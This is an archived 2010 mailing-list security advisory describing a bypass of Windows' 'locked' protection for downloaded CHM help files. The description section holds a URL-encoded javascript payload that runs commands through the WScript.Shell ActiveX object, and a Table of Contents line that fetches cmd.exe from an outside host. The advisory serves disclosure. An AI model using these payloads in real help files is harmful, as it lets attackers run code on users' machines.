lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <DA9966FCC637E843AC66318C53B744221C9E1E59E5@whau.smb2go.net>
Date: Wed, 23 Jun 2010 14:05:56 +1200
From: Paul Craig <paul.craig@...urity-assessment.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: Microsoft Help Files (.CHM): 'Locked File' Feature Bypass

     (    , )     (,
  .   `.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .`), ) _ _,
 /  _____/  / _  \    ____  ___   _____  
 \____  \==/ /_\  \ _/ ___\/ _ \ /     \
 /       \/   |    \\  \__( <_> \  Y Y  \
/______  /\___|__  / \____>_ __/|__|_|  /
       \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _='`"``=.

Microsoft Help Files (.CHM): 'Locked File' Bypass
Versions Affected: Windows XP, Windows Vista, Windows 7

pdf: http://www.security-assessment.com/files/advisories/Windows_Locked_HelpFiles.pdf

+-----------+
|Description|
+-----------+

Changes made with Windows XP introduced additional origin validation 
for files downloaded from the Internet when saved to an
NTFS volume. This 'feature' is present in Windows XP, Vista and 7.

When a user downloads a .CHM file using Internet Explorer (or another browser)
Windows will mark an NTFS meta-data flag for the file, which indicates
the file should be "Locked". Locked Help Files will not render any
content within the CHM file using the Help File Viewer (hh.exe) until
a user selects the file in Explorer and clicks the "Unblock" button
under the files properties, which resets the NTFS meta-data flag.

This security feature can be bypassed by referencing external URI handlers
from the CHM file's Table of Contents file, and links can directly accessed
regardless of the help files locked state.

Consider this example which references a local html file, and will not render:

<param name="Name" value="I will not work">
<param name="Local" value="pleasegivemeashell.htm">

And this example which will render, and spawn a shell through javascript/vbscript + activex:

<param name="Name" value="shell">
 <param name="Local" 
value="javascript:document.write('%3C%68%74%6D%6C%3E%3C%73%63%72%69%70
%74%3E%76%61%72%20%63%6F%6D%6D%61%6E%64%3D%70%72%6F%6D%70%74%28%22%5 
7%68%69%63%68%20%66%69%6C%65%20%74%6F%20%73%70%61%77%6E%3F%22%29%3B%76
%61%72%20%77%73%68%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6 
A%65%63%74%28%22%57%53%63%72%69%70%74%2E%53%68%65%6C%6C%22%29%3B%77%73
%68%2E%52%75%6E%28%63%6F%6D%6D%61%6E%64%29%3B%3C%2F%73%63%72%69%70%74%
3E%3C%2F%68%74%6D%6C%3E');">

The same technique can be used to download remote files, by linking the
table of contents to a remote http:// resource.

<param name="Local" value="http://ikat.ha.cked.net/Windows/files/cmd.exe">

The implemented locked 'feature' and the NTFS flag are effectively useless for CHM files.

Although I would not call this an exploit, it does illustrate a nifty trick that may prove
useful to someone else.
It might also make you think twice next time you download a Help File.

+------------+
|Exploitation|
+------------+

An example CHM file can be found at: 
http://www.security-assessment.com/files/advisories/blockedhelp.chm

Source code to the Help file is available at:
http://www.security-assessment.com/files/advisories/blockedhelp_src.zip

+--------+
|Solution|
+--------+

Microsoft acknowledge that this is a bug, but do not think it requires fixing until
the next Windows Service Pack. This is due to the mitigating circumstances of CHM files
and the requirements of an NTFS file system.

This was the response I expected.



Paul Craig
Principal Security Consultant
Security-Assessment.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ